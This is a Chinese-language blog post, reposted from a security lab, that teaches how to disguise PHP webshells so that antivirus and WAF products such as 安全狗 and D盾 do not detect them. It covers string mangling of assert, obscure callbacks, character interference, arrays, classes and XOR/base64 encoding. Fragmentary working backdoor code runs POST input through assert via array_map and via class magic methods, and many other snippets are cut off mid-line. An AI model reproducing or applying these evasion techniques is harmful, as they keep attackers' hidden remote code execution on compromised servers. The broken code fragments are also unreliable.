因为前几天详细看了几个小马,想研究一下免杀的技巧,研究了下火绒安全对小马的免杀效果,跟下面描述的效果差不多,不过像D盾,360网站安全卫士等等的这些WAF效果我就不清楚了
其实总结下来,免杀的技巧大概就是各种方式的编码(包括base64、ascii的转换……),各种字符串的组合(绕过特征码)
转载自404安全实验室(小声的说一下,我没找404授权^_^,我一个小兵,实在不好意思找人家授权,转载来自己看看)
尽最大努力在一文中让大家掌握一些有用的WEBSHELL免杀技巧
关于eval 与 assert
字符串变形
定义函数绕过
回调函数
回调函数变形
特殊字符干扰
数组
类
编码绕过
无字符特征马
PHP7.1后webshell何去何从
总结
关于eval函数在php给出的官方说明是
eval 是一个语言构造器而不是一个函数,不能被 可变函数 调用 可变函数:通过一个变量,获取其对应的变量值,然后通过给该值增加一个括号(),让系统认为该值是一个函数,从而当做函数来执行 通俗的说比如你
这样是不行的 也造就了用eval的话达不到assert的灵活,但是在php7.1以上assert已经不行
关于assert函数
assert() 回调函数在构建自动测试套件的时候尤其有用,因为它们允许你简易地捕获传入断言的代码,并包含断言的位置信息。 当信息能够被其他方法捕获,使用断言可以让它更快更方便!
字符串变形多数用于BYPASS安全狗,相当对于D盾,安全狗更加重视"形" 一个特殊的变形就能绕过安全狗,看看PHP手册,有着很多关于操作字符串的函数
ucwords() //函数把字符串中每个单词的首字符转换为大写。
ucfirst() //函数把字符串中的首字符转换为大写。
trim() //函数从字符串的两端删除空白字符和其他预定义字符。
substr_replace() //函数把字符串的一部分替换为另一个字符串
substr() //函数返回字符串的一部分。
strtr() //函数转换字符串中特定的字符。
strtoupper() //函数把字符串转换为大写。
strtolower() //函数把字符串转换为小写。
strtok() //函数把字符串分割为更小的字符串
str_rot13() //函数对字符串执行 ROT13 编码。
由于PHP的灵活性操作字符串的函数很多,我这里就不一一列举了
用 substr_replace()
函数变形assert 达到免杀的效果
其他函数类似 不一一列举了
定义一个函数把关键词分割达到bypass效果
反之
效果一样,这种绕过方法,对安全狗还是比较有效的 在d盾面前就显得小儿科了 ,不过后面会讲到如何用定义函数的方法来 绕过d盾
call_user_func_array()
call_user_func()
array_filter()
array_walk()
array_map()
registregister_shutdown_function()
register_tick_function()
filter_var()
filter_var_array()
uasort()
uksort()
array_reduce()
array_walk()
array_walk_recursive()
回调函数大部分已经被安全软件加入全家桶套餐 所以找到一个生僻的不常用的回调函数来执行 比如
这个函数能过狗,但是D盾显示是一级
前面说过众多回调函数已经被加入豪华套餐了,怎么绕过呢,其实也很简单 那就是定义个函数 或者类来调用
定义一个函数
定义一个类
a=$a;
$this->b=$b;
}
function test() {
array_map($this->a,$this->b);
}
}
$p1=new loveme(assert,array($_POST['x']));
$p1->test();
?>
特殊字符干扰,要求是能干扰到杀软的正则判断,还要代码能执行,网上广为流传的连接符
初代版本
不过已经不能免杀了,利用适当的变形即可免杀 如
其他方法大家尽情发挥如"\r\n\t",函数返回,类,等等
除了连接符号 还有个命名空间的东西 \ 具体大家可以看看php手册
当然还有其他的符号熟读PHP手册就会有不一样的发现
把执行代码放入数组中执行绕过
$a($_POST['q'])];
?>
多维数组
$b($_POST['q'])));
?>
说到类肯定要搭配上魔术方法比如 __destruct()
, __construct()
直接上代码
a");
}
}
$b = new me;
$b->a = $_POST['x'];
?>
用类把函数包裹,D盾对类查杀较弱
用php的编码函数,或者用异或等等 简单的base64_decode,其中因为他的正则匹配可以加入一些下划线干扰杀软
异或
对于无特征马这里我的意思是 无字符特征
利用异或,编码等方式 例如p神博客的
利用正则匹配字符 如Tab等 然后转换为字符
利用POST包获取关键参数执行 例如
在php7.1后面我们已经不能使用强大的assert函数了用eval将更加注重特殊的调用方法和一些字符干扰,后期大家可能更加倾向使用大马
对于安全狗杀形,d盾杀参的思路来绕过。生僻的回调函数,特殊的加密方式,以及关键词的后传入都是不错的选择。 对于关键词的后传入对免杀安全狗,d盾,河马 等等都是不错的,后期对于菜刀的轮子,也要走向高度的自定义化 用户可以对传出的post数据进行自定义脚本加密,再由webshell进行解密获取参数,那么以现在的软WAF查杀能力 几乎为0,安全软件也需要与时俱进了。